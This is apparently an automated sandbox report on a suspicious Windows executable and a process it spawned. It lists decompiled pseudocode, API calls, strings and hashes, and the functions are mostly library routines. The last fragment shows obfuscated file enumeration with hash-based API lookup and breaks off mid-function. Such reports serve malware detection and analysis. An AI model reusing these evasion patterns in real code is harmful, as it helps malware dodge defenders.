Instruction ID: 0991ebd0fa5129877e21a5118ab4003fa57d8a1e05bbe212390e33009e0f709d
Opcode Fuzzy Hash: 1ede330d16080c1c95d27d4bf0c3672f6aaaf0e2f94890a87c5ee2107f815b63
Instruction Fuzzy Hash: 6B4137311042AC5AEB119B14CD4ABEB3B99DB12704F1914F6D28AE61E3C3394964C7EA

Uniqueness

Uniqueness Score: -1.00%

Function 00414354, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00414354(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t27;
				void* _t36;
				intOrPtr _t40;
				struct HINSTANCE__* _t46;
				CHAR* _t50;

				E00425FC6(1);
				E004067EC(0, 0);
				_push(0);
				_t50 = E004249C4() + 0x58;
				_t27 = E00424BFB();
				_t40 = _a8;
				_t46 =  *(_t27 + 8);
				if(_t40 != 0 || _a12 != _t40 || _a16 != _t40) {
					wsprintfA(_t50, "Afx:%x:%x:%x:%x:%x", _t46, _a4, _t40, _a12, _a16);
				} else {
					wsprintfA(_t50, "Afx:%x:%x", _t46, _a4);
				}
				if(GetClassInfoA(_t46, _t50,  &_v44) == 0) {
					_v44.style = _a4;
					_v44.lpfnWndProc = DefWindowProcA;
					_v44.cbWndExtra = 0;
					_v44.cbClsExtra = 0;
					_v44.lpszMenuName = 0;
					_v44.hIcon = _a16;
					_push( &_v44);
					_v44.hInstance = _t46;
					_v44.hCursor = _t40;
					_v44.hbrBackground = _a12;
					_v44.lpszClassName = _t50;
					_t36 = E004142C3();
					_t65 = _t36;
					if(_t36 == 0) {
						E0041A6C8(_t65);
					}
				}
				return _t50;
			}

0x00414356
0x0041435f
0x0041436a
0x00414374
0x00414377
0x0041437c
0x0041437f
0x00414384
0x004143b6
0x00414390
0x0041439a
0x004143a0
0x004143cd
0x004143d5
0x004143dd
0x004143e2
0x004143e5
0x004143e8
0x004143eb
0x004143f4
0x004143f5
0x004143f8
0x004143fb
0x004143fe
0x00414401
0x00414406
0x00414408
0x0041440a
0x0041440a
0x00414408
0x00414415

APIs

Part of subcall function 00425FC6: LeaveCriticalSection.KERNEL32(?,00425D5F,00000010,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700,0041843C), ref: 00425FDE

Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A

wsprintfA.USER32 ref: 0041439A
wsprintfA.USER32 ref: 004143B6
GetClassInfoA.USER32 ref: 004143C5

Strings

Afx:%x:%x, xrefs: 00414394

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: wsprintf$ClassCriticalExceptionInfoLeaveRaiseSection
String ID: Afx:%x:%x
API String ID: 2529146597-2071556601
Opcode ID: d77d54e2a205c26894113d0f98cb3835fbc2923fa6b7d860ecab1e58f07b156b
Instruction ID: 12ef8f29c3e1d770b63201246022492823754bba1a77f7a68e39ab1c72f0dc03
Opcode Fuzzy Hash: d77d54e2a205c26894113d0f98cb3835fbc2923fa6b7d860ecab1e58f07b156b
Instruction Fuzzy Hash: 99113370B002199FDB10EFA5D8819DF7BB8EF48354B54402BF914E3241E3789A918BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004092BC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004092BC() {
				signed int _v8;
				char _v12;
				CHAR* _t14;
				intOrPtr _t27;
				CHAR* _t37;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(_t33);
				_t46 =  *0x43b86c; // 0x1
				if(_t46 == 0) {
					E00406EE9();
				}
				GetModuleFileNameA(0, 0x439dd0, 0x104);
				_t14 =  *0x43b87c; // 0x4a3338
				 *0x439d24 = 0x439dd0;
				_t37 = 0x439dd0;
				if( *_t14 != 0) {
					_t37 = _t14;
				}
				E00409355(_t37, 0, 0,  &_v8,  &_v12);
				_t41 = E00405667(_v12 + _v8 * 4);
				if(_t41 == 0) {
					E00406490(8);
				}
				E00409355(_t37, _t41, _t41 + _v8 * 4,  &_v8,  &_v12);
				_t27 = _v8 - 1;
				 *0x439d0c = _t41;
				 *0x439d08 = _t27;
				return _t27;
			}

0x004092c0
0x004092c4
0x004092cc
0x004092ce
0x004092ce
0x004092df
0x004092e5
0x004092ea
0x004092f0
0x004092f4
0x004092f6
0x004092f6
0x00409303
0x00409317
0x0040931e
0x00409322
0x00409327
0x00409339
0x00409344
0x00409345
0x0040934d
0x00409354

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\2ojdmC51As.exe,00000104,?,00000000,?,?,?,?,00406428), ref: 004092DF

Strings

83J, xrefs: 004092E5
C:\Users\user\Desktop\2ojdmC51As.exe, xrefs: 004092D3, 004092DD, 00409302, 00409338

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: FileModuleName
String ID: 83J$C:\Users\user\Desktop\2ojdmC51As.exe
API String ID: 514040917-40566204
Opcode ID: 0f5333ee8a2dff6588455ba644662dd6d7049445c33136eb525253b45858dde5
Instruction ID: 4b94aae2b44b8e024f3e9ff9f5f305e43beb143c307f02a5dedadab18630ac66
Opcode Fuzzy Hash: 0f5333ee8a2dff6588455ba644662dd6d7049445c33136eb525253b45858dde5
Instruction Fuzzy Hash: DB1151B2900108BFD711EF95DC81CDF77ACDB49758B0500BBF905A3281D674AE00CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0CD, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040E0CD(intOrPtr __ecx) {
				void* _t30;
				void* _t33;

				E00406520(E0042AD9C, _t30);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x42e428;
				E0040F44C(__ecx, _t33, _t30 - 0x10);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				 *((char*)(__ecx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8))));
				E00401AE0(__ecx + 0xc, 0);
				E00402320(__ecx + 0xc,  *((intOrPtr*)(_t30 + 8)), 0,  *0x42b7d8);
				 *((intOrPtr*)(__ecx)) = 0x42f884;
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return __ecx;
			}

0x0040e0d2
0x0040e0d7
0x0040e0d8
0x0040e0e2
0x0040e0e5
0x0040e0ec
0x0040e0f4
0x0040e101
0x0040e103
0x0040e113
0x0040e11b
0x0040e126
0x0040e12e

APIs

__EH_prolog.LIBCMT ref: 0040E0D2

Strings

(B, xrefs: 0040E0E5
string too long, xrefs: 0040E0DA

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prolog
String ID: (B$string too long
API String ID: 3519838083-213930478
Opcode ID: f03796f0994221b19e597dc6b348fa6f620dcfc84c8546b3792d48647d6ad245
Instruction ID: 0881663991a763b1776dc7e615562ac6718b0cdd44e68c2937c70cca8b3e00b0
Opcode Fuzzy Hash: f03796f0994221b19e597dc6b348fa6f620dcfc84c8546b3792d48647d6ad245
Instruction Fuzzy Hash: 37F0C272700255AFCB14DB45DC41BAEF7B8EB84344F40403FF501A7281C7B86908C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E516, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040E516(intOrPtr __ecx, void* __eflags) {
				void* _t30;

				E00406520(E0042AE28, _t30);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x42e428;
				E0040F44C(__ecx, __eflags, _t30 - 0x10);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				 *((char*)(__ecx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8))));
				E00401AE0(__ecx + 0xc, 0);
				E00402320(__ecx + 0xc,  *((intOrPtr*)(_t30 + 8)), 0,  *0x42b7d8);
				 *((intOrPtr*)(__ecx)) = 0x42f908;
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return __ecx;
			}

0x0040e51b
0x0040e520
0x0040e521
0x0040e52b
0x0040e52e
0x0040e535
0x0040e53d
0x0040e54a
0x0040e54c
0x0040e55c
0x0040e564
0x0040e56f
0x0040e577

APIs

__EH_prolog.LIBCMT ref: 0040E51B

Strings

ios::failbit set, xrefs: 0040E523
(B, xrefs: 0040E52E

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prolog
String ID: (B$ios::failbit set
API String ID: 3519838083-3284000329
Opcode ID: 714bb1d5edfaf863b24652250af2c782f2a8feea1520e9748f6d812b5ca07bc2
Instruction ID: 4fe0a7923be2234898ba92f5c38d2ffc42e0a3632a550d53740f74c2571e9ed9
Opcode Fuzzy Hash: 714bb1d5edfaf863b24652250af2c782f2a8feea1520e9748f6d812b5ca07bc2
Instruction Fuzzy Hash: 51F06272701215AFD7149B55D841BAEBBB8EB85744F40443FF511B7281C7B8690887A9

Uniqueness

Uniqueness Score: -1.00%

Function 00404EAA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404EAA(char _a4, signed int _a8) {
				intOrPtr* _t18;

				if(E00404DD2() == 0) {
					if((_a8 & 0x00000003) != 0) {
						L8:
						return 0x12340042;
					}
					_t6 =  &_a4; // 0x404f63
					_t18 =  *_t6;
					if( *((intOrPtr*)(_t18 + 8)) <= 0 ||  *((intOrPtr*)(_t18 + 0xc)) <= 0 ||  *_t18 >= GetSystemMetrics(0) ||  *((intOrPtr*)(_t18 + 4)) >= GetSystemMetrics(1)) {
						return 0;
					} else {
						goto L8;
					}
				}
				return  *0x439610(_a4, _a8);
			}

0x00404eb3
0x00404eca
0x00404ef6
0x00000000
0x00404ef6
0x00404ecc
0x00404ecc
0x00404ed5
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ed5
0x00000000

APIs

GetSystemMetrics.USER32 ref: 00404EE3
GetSystemMetrics.USER32 ref: 00404EEB

Strings

cO@, xrefs: 00404ECC

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsSystem
String ID: cO@
API String ID: 4116985748-3035479601
Opcode ID: c9c4155c18cf154a998879a47653fee1527eb16e544136ed5b28fe4e123089dd
Instruction ID: ce698e49c9a3c3113b24397bbaff0b3bfb960c4a55519e17048666b9bd17cfe1
Opcode Fuzzy Hash: c9c4155c18cf154a998879a47653fee1527eb16e544136ed5b28fe4e123089dd
Instruction Fuzzy Hash: 6AF03071104352DBC7219A35D804527B7D0BBC4355F008C7EE795A65D1D738D882EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E073, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040E073(void* __eflags) {
				intOrPtr* _t42;
				intOrPtr* _t52;
				void* _t54;
				signed int _t60;

				E00406520(E0042AD88, _t54);
				 *((char*)(_t54 - 0x20)) =  *((intOrPtr*)(_t54 - 0xd));
				E00401AE0(_t54 - 0x20, 0);
				E00401B90(_t54 - 0x20, "string too long", E00405A40("string too long"));
				_t5 = _t54 - 4;
				 *_t5 =  *(_t54 - 4) & 0x00000000;
				_t60 =  *_t5;
				_push(_t54 - 0x20);
				_t42 = _t54 - 0x3c;
				L1();
				 *((intOrPtr*)(_t54 - 0x3c)) = 0x42f864;
				E004067EC(_t54 - 0x3c, 0x4336b8);
				_pop(_t51);
				E00406520(E0042AD9C, _t54);
				_push(_t42);
				_push(_t42);
				_t52 = _t42;
				 *((intOrPtr*)(_t54 - 0x14)) = _t52;
				 *((intOrPtr*)(_t54 - 0x10)) = 0x42e428;
				E0040F44C(_t42, _t60, _t54 - 0x10);
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				 *((char*)(_t52 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8))));
				E00401AE0(_t52 + 0xc, 0);
				E00402320(_t52 + 0xc,  *((intOrPtr*)(_t54 + 8)), 0,  *0x42b7d8);
				 *_t52 = 0x42f884;
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
				return _t52;
			}

0x0040e078
0x0040e089
0x0040e08c
0x0040e0a2
0x0040e0a7
0x0040e0a7
0x0040e0a7
0x0040e0ae
0x0040e0af
0x0040e0b2
0x0040e0c0
0x0040e0c7
0x0040e0cc
0x0040e0d2
0x0040e0d7
0x0040e0d8
0x0040e0df
0x0040e0e2
0x0040e0e5
0x0040e0ec
0x0040e0f4
0x0040e101
0x0040e103
0x0040e113
0x0040e11b
0x0040e126
0x0040e12e

APIs

__EH_prolog.LIBCMT ref: 0040E078

Part of subcall function 0040E0CD: __EH_prolog.LIBCMT ref: 0040E0D2

Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A

Strings

ios::failbit set, xrefs: 0040E083
string too long, xrefs: 0040E091, 0040E096, 0040E09E

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prolog$ExceptionRaise
String ID: ios::failbit set$string too long
API String ID: 2062786585-1331328489
Opcode ID: bbf4af397965b2b2160e068da4858f3148205e3645e3424e421b924f25707da3
Instruction ID: 323c5a97231c9e7e2180db571d543564ba768becdaa7b618deba2c25bb2dd9de
Opcode Fuzzy Hash: bbf4af397965b2b2160e068da4858f3148205e3645e3424e421b924f25707da3
Instruction Fuzzy Hash: 68F03A62D111286ACB04F6E6EC42AEEBB7CAF08345F40407AF411B6092DB785608CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00425BA0, Relevance: 5.1, APIs: 4, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00425BA0(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t29;
				intOrPtr _t32;
				long* _t37;
				intOrPtr* _t42;
				signed int _t45;
				struct _CRITICAL_SECTION* _t46;
				intOrPtr* _t49;

				_push(__ecx);
				_t49 = _a4;
				_t37 = __ecx;
				_t45 = 1;
				_v8 = _t45;
				if( *((intOrPtr*)(_t49 + 8)) <= _t45) {
					L10:
					_t46 =  &(_t37[7]);
					EnterCriticalSection(_t46);
					E0042581A( &(_t37[5]), _t49);
					LeaveCriticalSection(_t46);
					LocalFree( *(_t49 + 0xc));
					if(_t49 != 0) {
						 *((intOrPtr*)( *_t49))(1);
					}
					_t29 = TlsSetValue( *_t37, 0);
					L13:
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t37[4] + 4 + _t45 * 8)) == _t32) {
						_t42 =  *((intOrPtr*)( *(_t49 + 0xc) + _t45 * 4));
						if(_t42 != 0) {
							 *((intOrPtr*)( *_t42))(1);
						}
						_t29 =  *(_t49 + 0xc);
						 *(_t29 + _t45 * 4) =  *(_t29 + _t45 * 4) & 0x00000000;
					} else {
						_t29 =  *(_t49 + 0xc);
						if( *(_t29 + _t45 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t45 = _t45 + 1;
				} while (_t45 <  *((intOrPtr*)(_t49 + 8)));
				if(_v8 == 0) {
					goto L13;
				}
				goto L10;
			}

0x00425ba3
0x00425ba6
0x00425bac
0x00425bae
0x00425bb2
0x00425bb5
0x00425bf9
0x00425bf9
0x00425bfd
0x00425c07
0x00425c0d
0x00425c16
0x00425c1e
0x00425c26
0x00425c26
0x00425c2c
0x00425c32
0x00425c36
0x00000000
0x00000000
0x00000000
0x00425bb7
0x00425bb7
0x00425bb7
0x00425bbc
0x00425bd9
0x00425bde
0x00425be4
0x00425be4
0x00425be6
0x00425be9
0x00425bc7
0x00425bc7
0x00425bce
0x00425bd0
0x00425bd0
0x00425bce
0x00425bed
0x00425bee
0x00425bf7
0x00000000
0x00000000
0x00000000

APIs

EnterCriticalSection.KERNEL32(?), ref: 00425BFD
LeaveCriticalSection.KERNEL32(?,?), ref: 00425C0D
LocalFree.KERNEL32(?), ref: 00425C16
TlsSetValue.KERNEL32(?,00000000), ref: 00425C2C

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: cf5b2c567d48c01c7a453ca9de575100b85300225b99a98f7f9799342d216000
Instruction ID: 2aca870bf4ceec97ac406f80c089e65d4ca4c841141b20e4fc51915e0dfd648f
Opcode Fuzzy Hash: cf5b2c567d48c01c7a453ca9de575100b85300225b99a98f7f9799342d216000
Instruction Fuzzy Hash: BA21AC31305724EFC7249F45E888B6A7BA4FF40712F9080AEE5428B2A1D7B8F841CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00425F56, Relevance: 5.0, APIs: 4, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00425F56(signed int _a4) {
				void* _t14;
				struct _CRITICAL_SECTION* _t16;
				signed int _t22;
				intOrPtr* _t25;
				intOrPtr _t30;
				intOrPtr _t31;

				_t30 =  *0x439bdc; // 0x1
				if(_t30 == 0) {
					_t14 = E00425EC3();
				}
				_t31 =  *0x439bd8; // 0x0
				if(_t31 == 0) {
					_t22 = _a4;
					_t25 = 0x4399e0 + _t22 * 4;
					if( *((intOrPtr*)(0x4399e0 + _t22 * 4)) == 0) {
						EnterCriticalSection(0x439a28);
						if( *_t25 == 0) {
							InitializeCriticalSection(0x439a40 + (_t22 + _t22 * 2) * 8);
							 *_t25 =  *_t25 + 1;
						}
						LeaveCriticalSection(0x439a28);
					}
					_t16 = 0x439a40 + (_t22 + _t22 * 2) * 8;
					EnterCriticalSection(_t16);
					return _t16;
				}
				return _t14;
			}

0x00425f59
0x00425f5f
0x00425f61
0x00425f61
0x00425f66
0x00425f6c
0x00425f70
0x00425f81
0x00425f88
0x00425f91
0x00425f96
0x00425fa3
0x00425fa9
0x00425fa9
0x00425fac
0x00425fb2
0x00425fb6
0x00425fbe
0x00000000
0x00425fc1
0x00425fc3

APIs

EnterCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425F91
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FA3
LeaveCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FAC
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700), ref: 00425FBE

Part of subcall function 00425EC3: GetVersion.KERNEL32(?,00425F66,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700,0041843C), ref: 00425ED6

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: 8ad6497125d2c86d00cbfb5de7a409f9b0d7499c984595d8118e55b052ad55c4
Instruction ID: b3ac33658b3b741abd4bb59a3792cd3dace0394c803b1a2d8ae3ffca9e92013f
Opcode Fuzzy Hash: 8ad6497125d2c86d00cbfb5de7a409f9b0d7499c984595d8118e55b052ad55c4
Instruction Fuzzy Hash: 00F0497160472ADFCB20EF64FC84997B3ACFB18316B81203BE64582161D774B956DBAC

Uniqueness

Uniqueness Score: -1.00%

Function 004079AB, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004079AB(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x436f2c);
				InitializeCriticalSection( *0x436f1c);
				InitializeCriticalSection( *0x436f0c);
				InitializeCriticalSection( *0x436eec);
				return _t1;
			}

0x004079ab
0x004079b8
0x004079c0
0x004079c8
0x004079d0
0x004079d3

APIs

InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079B8
InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079C0
InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079C8
InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079D0

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: 51e235add1c7942b8d8dfe3c36194d8a20d458bafa86fc8f5d4db9dc8472a5e3
Instruction ID: 7b146446db7a68f273d69e9c37099d6d57513ee84f4d93e1aa445e082747f6c1
Opcode Fuzzy Hash: 51e235add1c7942b8d8dfe3c36194d8a20d458bafa86fc8f5d4db9dc8472a5e3
Instruction Fuzzy Hash: 67C00235905135FADF516B75FC058493F25EB063A0312E172E5145103487631C15EFD8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: iasrecst.exe PID: 2964 Parent PID: 5356 iasrecst.exeCOMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	53.8%
Signature Coverage:	2.7%
Total number of Nodes:	624
Total number of Limit Nodes:	76

Executed Functions

Function 02281030, Relevance: 18.4, APIs: 12, Instructions: 362
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(02284054,02284040), ref: 02281047
GetProcAddress.KERNEL32(00000000), ref: 0228104E

Part of subcall function 02281B30: SetLastError.KERNEL32(0000000D,?,02281070,?,00000040), ref: 02281B3D

SetLastError.KERNEL32(000000C1), ref: 02281096

Memory Dump Source

Source File: 00000001.00000002.496560392.0000000002281000.00000020.00000001.sdmp, Offset: 02281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2281000_iasrecst.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: c9bb12b28bbd985bb497e5e1be392c58c0a13bba2a06294d8ca4fba1ad6a33d9
Instruction ID: 25377925d168d97612f9496124590a1702dfe58e2d39cff4a91c573cf1ca2a77
Opcode Fuzzy Hash: c9bb12b28bbd985bb497e5e1be392c58c0a13bba2a06294d8ca4fba1ad6a33d9
Instruction Fuzzy Hash: B7F1E9B4E11209EFDB04DFD4D984BAEB7B1BF48304F208598E909AB395D771EA52CB50

Uniqueness

Uniqueness Score: -1.00%

Function 022C38F0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E022C38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v524;
				short _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				signed int _t24;
				intOrPtr* _t28;
				intOrPtr _t33;
				void* _t35;
				intOrPtr* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				signed int _t49;
				int _t55;
				void* _t58;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t100;

				_t93 = __ecx;
				_t97 = __edx;
				_v1640 = __ecx;
				_t22 = 0x1b0f738d;
				_t58 = _v1640;
				goto L1;
				do {
					while(1) {
						L1:
						_t100 = _t22 - 0xd5d5438;
						if(_t100 <= 0) {
							break;
						}
						if(_t22 == 0x1b0f738d) {
							_t22 = 0x1c39f1c;
							continue;
						} else {
							if(_t22 != 0x3aa0d798) {
								goto L6;
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t24 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t24 & 0xffb9c0ef) + 0x651b5f5;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L30:
										if(_t97 == 0) {
											goto L29;
										} else {
											_t96 = E022C34C0(0x22cd260);
											_t28 =  *0x22cdc60;
											if(_t28 == 0) {
												_t28 = E022C3E80(_t58, E022C3F20(0xe66945e6), 0xcca28b0d, _t97);
												 *0x22cdc60 = _t28;
											}
											 *_t28( &_v524, 0x104, _t96, _t93,  &(_v1636.cFileName));
